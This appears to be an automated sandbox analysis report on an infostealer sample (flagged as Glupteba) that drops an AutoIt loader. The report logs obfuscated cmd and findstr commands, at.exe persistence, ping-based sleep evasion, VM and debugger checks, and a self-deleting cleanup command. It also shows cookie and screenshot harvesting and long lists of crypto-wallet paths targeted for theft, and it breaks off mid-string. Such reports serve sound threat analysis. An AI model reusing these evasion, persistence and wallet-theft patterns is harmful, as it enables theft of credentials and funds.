Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\sldDCZXdq & timeout 3 & del /f /q 'C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Process created: C:\Windows\SysWOW64\at.exe 'C:\Windows\System32\at.exe'	Jump to behavior
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Emergevano.m4a	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^rVXykbQqapJWWMDHyvEvyHNVAdBwZDWHZRqXvSSwIZqGLuAOebILYIqvoeEVVOqOheXtLGljECOuHulzQNZBUlIs$' Giudichera.m4a	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com Male.exe.com p	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Process created: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com p	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\sldDCZXdq & timeout 3 & del /f /q 'C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 32_64_ver_2_bit.exe

Static file information: File size 1807502 > 1048576

Data Obfuscation:

Obfuscated command line found

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^rVXykbQqapJWWMDHyvEvyHNVAdBwZDWHZRqXvSSwIZqGLuAOebILYIqvoeEVVOqOheXtLGljECOuHulzQNZBUlIs$' Giudichera.m4a
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^rVXykbQqapJWWMDHyvEvyHNVAdBwZDWHZRqXvSSwIZqGLuAOebILYIqvoeEVVOqOheXtLGljECOuHulzQNZBUlIs$' Giudichera.m4a			Jump to behavior

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe

Code function: 0_2_00407F31 LoadLibraryA,GetProcAddress,GetWindow,GetWindow,GetDlgItem,GetWindow,

0_2_00407F31

Source: 32_64_ver_2_bit.exe

Static PE information: real checksum: 0x1ba489 should be: 0x1c0217

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_00419210 push eax; ret	0_2_0041923E
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_00418F40 push ecx; mov dword ptr [esp], ecx	0_2_00418F41
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Code function: 8_2_013D0E96 push ecx; ret	8_2_013D0EA9

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe

Process created: C:\Windows\SysWOW64\at.exe 'C:\Windows\System32\at.exe'

Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com

Code function: 8_2_013CFC88 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

8_2_013CFC88

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Uses ping.exe to sleep

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30			Jump to behavior

Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc			Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}			Jump to behavior

Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com

Registry key enumerated: More than 346 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Windows\System32\conhost.exe TID: 6740	Thread sleep count: 69 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com TID: 6848	Thread sleep time: -54066s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_00409A19 ??2@YAPAXI@Z,FindFirstFileW,FindClose,	0_2_00409A19
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_004044EA FindFirstFileW,FindClose,SetLastError,CompareFileTime,	0_2_004044EA
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_0040340F FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_0040340F
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_0040352A FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,	0_2_0040352A
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Code function: 8_2_0141E334 GetFileAttributesW,FindFirstFileW,FindClose,	8_2_0141E334

Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com

Code function: 8_2_013B29A4 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

8_2_013B29A4

Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File opened: C:\Users\user\AppData\Local\Temp\sldDCZXdq\files_	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File opened: C:\Users\user\AppData\Local\Temp\sldDCZXdq	Jump to behavior

Source: Male.exe.com, 00000008.00000003.214833127.0000000004431000.00000004.00000001.sdmp	Binary or memory string: eruucotPKDNVPuBvnkVuqqFYIATXEglWnSyKUCJlQprQvhGFsKIyGYPee
Source: at.exe, 00000002.00000002.197751132.0000000000BE0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Male.exe.com, 00000008.00000003.224388565.0000000001AA8000.00000004.00000001.sdmp, Male.exe.com, 0000000A.00000002.482518570.00000000015D1000.00000004.00000020.sdmp, Essa.m4a.0.dr	Binary or memory string: For $mjKHaFJXscQEaAcxqIOwnZuwIsKQBgvGbfZFkhGFseBYYKxLASEvGa = 9 To 31
Source: Male.exe.com, 0000000A.00000002.483626807.0000000003E62000.00000004.00000001.sdmp	Binary or memory string: OWispYkuvxznQKOTQOnMCKHMnJGnScDYzVnUkKNNchCqEMUex
Source: Male.exe.com, 0000000A.00000002.482518570.00000000015D1000.00000004.00000020.sdmp	Binary or memory string: Local $taVZNzlpcLSuudBt = 'eruucotPKDNVPuBvnkVuqqFYIATXEglWnSyKUCJlQprQvhGFsKIyGYPe'$
Source: Male.exe.com, 0000000A.00000002.484520661.000000000407F000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWa\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\.ation Data\Application Data\Application Data\Temporary Inte
Source: Male.exe.com, 0000000A.00000002.482518570.00000000015D1000.00000004.00000020.sdmp, Essa.m4a.0.dr	Binary or memory string: $YGYOovfnhwUFS = Execute(GNECKBFHY("76<122<113<126<109<79<109<124<91<109<122<113<105<116<48<47<90<105<127<96<85<80<128<97<47<49",8)), $XkKNouehuq = 'OWispYkuvxznQKOTQOnMCKHMnJGnScDYzVnUkKNNchCqEMUex'
Source: Male.exe.com, 0000000A.00000002.482451448.0000000001524000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: Male.exe.com, 00000008.00000003.215332472.00000000043D4000.00000004.00000001.sdmp	Binary or memory string: OWispYkuvxznQKOTQOnMCKHMnJGnScDYzVnUkKNNchCqEMUex16<48E
Source: at.exe, 00000002.00000002.197751132.0000000000BE0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: at.exe, 00000002.00000002.197751132.0000000000BE0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Essa.m4a.0.dr	Binary or memory string: Local $taVZNzlpcLSuudBt = 'eruucotPKDNVPuBvnkVuqqFYIATXEglWnSyKUCJlQprQvhGFsKIyGYPe'
Source: Male.exe.com, 00000008.00000003.212227599.0000000001B40000.00000004.00000001.sdmp	Binary or memory string: Local $taVZNzlpcLSuudBt = 'eruucotPKDNVPuBvnkVuqqFYIATXEglWnSyKUCJlQprQvhGFsKIyGYPe'z
Source: Male.exe.com, 00000008.00000003.218786083.0000000004202000.00000004.00000001.sdmp, Male.exe.com, 0000000A.00000002.482169751.00000000012FA000.00000004.00000001.sdmp	Binary or memory string: MJKHAFJXSCQEAACXQIOWNZUWISKQBGVGBFZFKHGFSEBYYKXLASEVGA
Source: Male.exe.com, 0000000A.00000002.483885097.0000000003EE4000.00000004.00000001.sdmp	Binary or memory string: eruucotPKDNVPuBvnkVuqqFYIATXEglWnSyKUCJlQprQvhGFsKIyGYPe
Source: at.exe, 00000002.00000002.197751132.0000000000BE0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: Male.exe.com, 00000008.00000003.210912806.0000000001B1E000.00000004.00000001.sdmp	Binary or memory string: $YGYOovfnhwUFS = Execute(GNECKBFHY("76<122<113<126<109<79<109<124<91<109<122<113<105<116<48<47<90<105<127<96<85<80<128<97<47<49",8)), $XkKNouehuq = 'OWispYkuvxznQKOTQOnMCKHMnJGnScDYzVnUkKNNchCqEMUex'<]

Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com

Code function: 8_2_013B331E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

8_2_013B331E

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe

Code function: 0_2_00407F31 LoadLibraryA,GetProcAddress,GetWindow,GetWindow,GetDlgItem,GetWindow,

0_2_00407F31

Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com

Code function: 8_2_013D5108 mov eax, dword ptr fs:[00000030h]

8_2_013D5108

Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Code function: 8_2_013E29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		8_2_013E29B2
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Code function: 8_2_013D1041 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		8_2_013D1041

Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com

Code function: 8_2_013B331E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

8_2_013B331E

Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com

8_2_013CFC88

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Process created: C:\Windows\SysWOW64\at.exe 'C:\Windows\System32\at.exe'	Jump to behavior
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Emergevano.m4a	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^rVXykbQqapJWWMDHyvEvyHNVAdBwZDWHZRqXvSSwIZqGLuAOebILYIqvoeEVVOqOheXtLGljECOuHulzQNZBUlIs$' Giudichera.m4a	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com Male.exe.com p	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\sldDCZXdq & timeout 3 & del /f /q 'C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3	Jump to behavior

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe

Code function: 0_2_00403FF2 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00403FF2

Source: Male.exe.com, 00000008.00000000.206974366.0000000001473000.00000002.00020000.sdmp, Male.exe.com, 0000000A.00000002.482395503.0000000001473000.00000002.00020000.sdmp, Male.exe.com.7.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Male.exe.com	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe

Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,

0_2_00403DC8

Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Queries volume information: C:\Users\user\AppData\Local\Temp\sldDCZXdq\_Files\_AllCookies_list.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Queries volume information: C:\Users\user\AppData\Local\Temp\sldDCZXdq\_Files\_Cookies\google_chrome_new.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Queries volume information: C:\Users\user\AppData\Local\Temp\sldDCZXdq\_Files\_Information.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Queries volume information: C:\Users\user\AppData\Local\Temp\sldDCZXdq\_Files\_Screen_Desktop.jpeg VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Queries volume information: C:\Users\user\AppData\Local\Temp\sldDCZXdq\files_\cookies\google_chrome_new.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Queries volume information: C:\Users\user\AppData\Local\Temp\sldDCZXdq\files_\cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Queries volume information: C:\Users\user\AppData\Local\Temp\sldDCZXdq\files_\screenshot.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Queries volume information: C:\Users\user\AppData\Local\Temp\sldDCZXdq\files_\system_info.txt VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe

Code function: 0_2_004029DA ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??3@YAXPAX@Z,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,

0_2_004029DA

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe

Code function: 0_2_00406128 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,KiUserCallbackDispatcher,GetVersionExW,GetCommandLineW,GetCommandLineW,GetCommandLineW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,??3@YAXPAX@Z,lstrlenW,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,

0_2_00406128

Stealing of Sensitive Information:

Yara detected Glupteba

Show sources

Source: Yara match	File source: 0000000A.00000002.484520661.000000000407F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Male.exe.com PID: 6844, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: Male.exe.com, 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	String found in binary or memory: .%USERPROFILE%\Desktop\.txt%USERPROFILE%wallet.datUTC--2%LocalAppData%\Coinomi%AppData%\waves-exchange%AppData%\Ledger Live\sqlite\_Files\_Files\Coinomi\_Files\_Files\waves_exchange\_Files\_Files\Ledger_Live_sqlite\_Files\_Wallet\Electrum\_Files\_Wallet\ElectronCash\_Files\_Wallet\Electrum-btcp%USERPROFILE%\AppData\Roaming\Jaxx%USERPROFILE%\AppData\Roaming\Exodus%USERPROFILE%\AppData\Roaming\MultiBitHD%USERPROFILE%\Documents\Monero%USERPROFILE%\AppData\Roaming\Exodus Eden%USERPROFILE%\AppData\Roaming\Electrum\wallets%USERPROFILE%\AppData\Roaming\Electrum-btcp\wallets%USERPROFILE%\AppData\Roaming\ElectronCash\wallets%USERPROFILE%\AppData\Roaming\com.liberty.jaxx%APPDATA%\Atomic%APPDATA%\waves-client\_Files\_Wallet\Jaxx\_Files\_Wallet\Exodus\_Files\_Wallet\MultiBitHD\_Files\_Wallet\Monero\_Files\_Wallet\Exodus Eden\_Files\_Wallet\Electrum\wallets\_Files\_Wallet\Electrum-btcp\wallets\_Files\_Wallet\ElectronCash\wallets\_Files\_Wallet\com.liberty.jaxx\_Files\_Wallet\Atomic\_Files\_Wallet\waves-client\_Files\_Information.txt\files_\system_info.txt%wS [ %wS ]
Source: Male.exe.com, 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	String found in binary or memory: .%USERPROFILE%\Desktop\.txt%USERPROFILE%wallet.datUTC--2%LocalAppData%\Coinomi%AppData%\waves-exchange%AppData%\Ledger Live\sqlite\_Files\_Files\Coinomi\_Files\_Files\waves_exchange\_Files\_Files\Ledger_Live_sqlite\_Files\_Wallet\Electrum\_Files\_Wallet\ElectronCash\_Files\_Wallet\Electrum-btcp%USERPROFILE%\AppData\Roaming\Jaxx%USERPROFILE%\AppData\Roaming\Exodus%USERPROFILE%\AppData\Roaming\MultiBitHD%USERPROFILE%\Documents\Monero%USERPROFILE%\AppData\Roaming\Exodus Eden%USERPROFILE%\AppData\Roaming\Electrum\wallets%USERPROFILE%\AppData\Roaming\Electrum-btcp\wallets%USERPROFILE%\AppData\Roaming\ElectronCash\wallets%USERPROFILE%\AppData\Roaming\com.liberty.jaxx%APPDATA%\Atomic%APPDATA%\waves-client\_Files\_Wallet\Jaxx\_Files\_Wallet\Exodus\_Files\_Wallet\MultiBitHD\_Files\_Wallet\Monero\_Files\_Wallet\Exodus Eden\_Files\_Wallet\Electrum\wallets\_Files\_Wallet\Electrum-btcp\wallets\_Files\_Wallet\ElectronCash\wallets\_Files\_Wallet\com.liberty.jaxx\_Files\_Wallet\Atomic\_Files\_Wallet\waves-client\_Files\_Information.txt\files_\system_info.txt%wS [ %wS ]
Source: Male.exe.com, 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	String found in binary or memory: .%USERPROFILE%\Desktop\.txt%USERPROFILE%wallet.datUTC--2%LocalAppData%\Coinomi%AppData%\waves-exchange%AppData%\Ledger Live\sqlite\_Files\_Files\Coinomi\_Files\_Files\waves_exchange\_Files\_Files\Ledger_Live_sqlite\_Files\_Wallet\Electrum\_Files\_Wallet\ElectronCash\_Files\_Wallet\Electrum-btcp%USERPROFILE%\AppData\Roaming\Jaxx%USERPROFILE%\AppData\Roaming\Exodus%USERPROFILE%\AppData\Roaming\MultiBitHD%USERPROFILE%\Documents\Monero%USERPROFILE%\AppData\Roaming\Exodus Eden%USERPROFILE%\AppData\Roaming\Electrum\wallets%USERPROFILE%\AppData\Roaming\Electrum-btcp\wallets%USERPROFILE%\AppData\Roaming\ElectronCash\wallets%USERPROFILE%\AppData\Roaming\com.liberty.jaxx%APPDATA%\Atomic%APPDATA%\waves-client\_Files\_Wallet\Jaxx\_Files\_Wallet\Exodus\_Files\_Wallet\MultiBitHD\_Files\_Wallet\Monero\_Files\_Wallet\Exodus Eden\_Files\_Wallet\Electrum\wallets\_Files\_Wallet\Electrum-btcp\wallets\_Files\_Wallet\ElectronCash\wallets\_Files\_Wallet\com.liberty.jaxx\_Files\_Wallet\Atomic\_Files\_Wallet\waves-client\_Files\_Information.txt\files_\system_info.txt%wS [ %wS ]
Source: Male.exe.com, 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	String found in binary or memory: .%USERPROFILE%\Desktop\.txt%USERPROFILE%wallet.datUTC--2%LocalAppData%\Coinomi%AppData%\waves-exchange%AppData%\Ledger Live\sqlite\_Files\_Files\Coinomi\_Files\_Files\waves_exchange\_Files\_Files\Ledger_Live_sqlite\_Files\_Wallet\Electrum\_Files\_Wallet\ElectronCash\_Files\_Wallet\Electrum-btcp%USERPROFILE%\AppData\Roaming\Jaxx%USERPROFILE%\AppData\Roaming\Exodus%USERPROFILE%\AppData\Roaming\MultiBitHD%USERPROFILE%\Documents\Monero%USERPROFILE%\AppData\Roaming\Exodus Eden%USERPROFILE%\AppData\Roaming\Electrum\wallets%USERPROFILE%\AppData\Roaming\Electrum-btcp\wallets%USERPROFILE%\AppData\Roaming\ElectronCash\wallets%USERPROFILE%\AppData\Roaming\com.liberty.jaxx%APPDATA%\Atomic%APPDATA%\waves-client\_Files\_Wallet\Jaxx\_Files\_Wallet\Exodus\_Files\_Wallet\MultiBitHD\_Files\_Wallet\Monero\_Files\_Wallet\Exodus Eden\_Files\_Wallet\Electrum\wallets\_Files\_Wallet\Electrum-btcp\wallets\_Files\_Wallet\ElectronCash\wallets\_Files\_Wallet\com.liberty.jaxx\_Files\_Wallet\Atomic\_Files\_Wallet\waves-client\_Files\_Information.txt\files_\system_info.txt%wS [ %wS ]
Source: Male.exe.com, 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	String found in binary or memory: .%USERPROFILE%\Desktop\.txt%USERPROFILE%wallet.datUTC--2%LocalAppData%\Coinomi%AppData%\waves-exchange%AppData%\Ledger Live\sqlite\_Files\_Files\Coinomi\_Files\_Files\waves_exchange\_Files\_Files\Ledger_Live_sqlite\_Files\_Wallet\Electrum\_Files\_Wallet\ElectronCash\_Files\_Wallet\Electrum-btcp%USERPROFILE%\AppData\Roaming\Jaxx%USERPROFILE%\AppData\Roaming\Exodus%USERPROFILE%\AppData\Roaming\MultiBitHD%USERPROFILE%\Documents\Monero%USERPROFILE%\AppData\Roaming\Exodus 